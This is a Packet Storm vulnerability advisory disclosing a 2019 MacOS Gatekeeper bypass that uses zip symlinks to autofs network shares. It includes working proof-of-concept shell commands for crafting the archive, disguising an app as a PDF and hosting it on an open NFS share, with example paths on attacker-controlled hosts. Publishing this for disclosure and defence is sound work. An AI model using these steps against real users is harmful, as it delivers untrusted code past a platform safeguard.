exploit the possibilities

MacOS X 10.14.5 Gatekeeper Bypass

MacOS X 10.14.5 Gatekeeper Bypass
Posted May 27, 2019
Authored by Filippo Cavallarin

MacOS X versions 10.14.5 and below suffer from a Gatekeeper bypass vulnerability.

tags | exploit, bypass
MD5 | 93c6142a9a5ed4292f4b1d7a3bd16e7a

MacOS X 10.14.5 Gatekeeper Bypass

Change Mirror Download
OVERVIEW
On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily
bypass Gatekeeper in order to execute untrusted code without any warning or
user's explicit permission.

Gatekeeper is a mechanism developed by Apple and included in MacOS X since
2012 that enforces code signing and verifies downloaded applications before
allowing them to run.
For example, if a user donwloads an application from internet and executes
it, Gatekeeper will prevent it from running without user's consens.

DETAILS
As per-design, Gatekeeper considers both external drives and network shares
as safe locations and it allows any application they contain to run.
By combining this design with two legitimate features of MacOS X, it will
result in the complete deceivement of the intended behaviour.

The first legit feature is automount (aka autofs) that allows a user to
automatically mount a network share just by accessing a "special" path, in
this case, any path beginning with "/net/".
For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the 'sharedfolder' on the remote host (
evil-attacker.com) using NFS.

The second legit feature is that zip archives can contain symbolic links
pointing to an arbitrary location (including automount enpoints) and that
the software on MacOS that is responsable to decompress zip files do not
perform any check on the symlinks before creatig them.

To better understand how this exploit works, let's consider the following
scenario:
An attacker crafts a zip file containing a symbolic link to an automount
endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and
sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the
symlink.

Now the victim is in a location controlled by the attacker but trusted by
Gatekeeper, so any attacker-controlled executable can be run without any
warning. The way Finder is designed (ex hide .app extensions, hide full
path from titlebar) makes this tecnique very effective and hard to spot.

The following video illustrates the concept

https://youtu.be/m74cpadIPZY

PoC
In order to reproduce this issue, follow the steps below:

create a zip file with a symlink to an automount endpoint
mkdir Documents
ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
zip -ry Documents.zip Documents
create an application (.app folder) with the code you want to run
cp -r /Applications/Calculator.app PDF.app
echo -e '#!/bin/bash'"\n"'open /Applications/iTunes.app' >
PDF.app/Contents/MacOS/Calculator
chmod +x PDF.app/Contents/MacOS/Calculator
rm PDF.app/Contents/Resources/AppIcon.icns
ln -s
/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns
PDF.app/Contents/Resources/AppIcon.icns
create a publicily accessible NFS share and put the .app in it
ssh linux-vm.local
mkdir -p /nfs/Documents
echo '/nfs/Documents
*(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >>
/etc/exports
service nfs-kernel-server restart
scp -r mymac.local:PDF.app /nfs/Documents/
upload the zip somewhere in internet and download it so it gets the
quarantine flag used by Gatekeeper
extract the zip (if needed) and navigate it
HISTORY
The vendor has been contacted on February 22th 2019 and it's aware of this
issue. This issue was supposed to be addressed, according to the vendor, on
May 15th 2019 but Apple started dropping my emails.
Since Apple is aware of my 90 days disclosure deadline, I make this
information public.

SOLUTION
No solution is available yet.

A possible workaround is to disable automount:

Edit /etc/auto_master as root
Comment the line beginning with '/net'
Reboot

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    18 Files
  • 3
    Apr 3rd
    0 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close